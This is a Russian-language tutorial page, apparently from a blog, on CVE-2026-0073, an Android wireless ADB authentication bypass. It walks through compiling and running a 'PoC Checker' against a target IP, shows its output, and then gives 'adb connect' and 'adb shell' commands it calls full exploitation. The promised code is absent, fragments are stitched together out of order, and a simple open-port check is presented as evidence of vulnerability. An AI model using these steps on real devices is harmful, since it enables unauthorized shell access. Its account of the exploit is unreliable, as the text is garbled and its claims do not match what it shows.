
CVE-2026-0073
CVE-2026-0073 — это критическая уязвимость обхода аутентификации в беспроводном ADB Android (демон adbd).
Злоумышленник в той же сети может обойти взаимную аутентификацию TLS и подключиться к устройству без одобрения пользователя или предварительного сопряжения.
| Параметр | Детали |
|---|---|
| CVE ID | CVE-2026-0073 |
| Критичность | Критический |
| CVSS Score | 8.8 |
| Затронутый компонент | adbd (Android Debug Bridge) — обработчик TLS |
| Тип | Обход аутентификации |
| Воздействие | Удаленный доступ к оболочке (shell пользователь) |
| Исправлено | Бюллетень безопасности Android за май 2026 |
Исправлено в: уровень безопасности 2026-05-01 и новее.
shelladbd_tls_verify_cert()Ошибка возникает, потому что файл CVE-2026-0073-Checker.cpp еще не существует.
nano CVE-2026-0073-Checker.cpp
Скопируйте и вставьте полный код ниже в редактор:
Сохраните и выйдите (Ctrl + X → Y → Enter)
Скомпилируйте снова:
g++ -o CVE-2026-0073 CVE-2026-0073-Checker.cpp -lssl -lcrypto -Wall -O2
./CVE-2026-0073 192.168.1.105
Вот что именно вы увидите, если программа на C++ успешно сработает на уязвимом устройстве Android:
╔══════════════════════════════════════════════════════════════╗
║ CVE-2026-0073 PoC Checker ║
║ Android Wireless ADB Authentication Bypass ║
╚══════════════════════════════════════════════════════════════╝
Target : 192.168.1.105
[*] Checking 192.168.1.105:5555 → OPEN
[!] Wireless ADB Port is Open!
[!] High chance of being vulnerable to CVE-2026-0073
Next Steps:
1. adb connect 192.168.1.105:5555
2. adb shell
OPEN зеленым -> Порт ADB прослушивается.Выполните эти команды:
adb connect 192.168.1.105:5555
Если выводится:
connected to 192.168.1.105:5555
Затем введите:
adb shell
Вы должны попасть внутрь устройства:
pixel8:/ $
Это полная успешная эксплуатация.
Этот PoC предназначен только для образовательного и авторизованного тестирования.
Вы можете использовать этот инструмент только на устройствах, которыми владеете, или на которые имеете явное разрешение на тестирование. Несанкционированное использование незаконно и строго запрещено.
Используйте на свой страх и риск. Автор не несет ответственности за любой ущерб или юридические последствия.
🎯 Сделано с осторожностью — используйте только на авторизованных устройствах.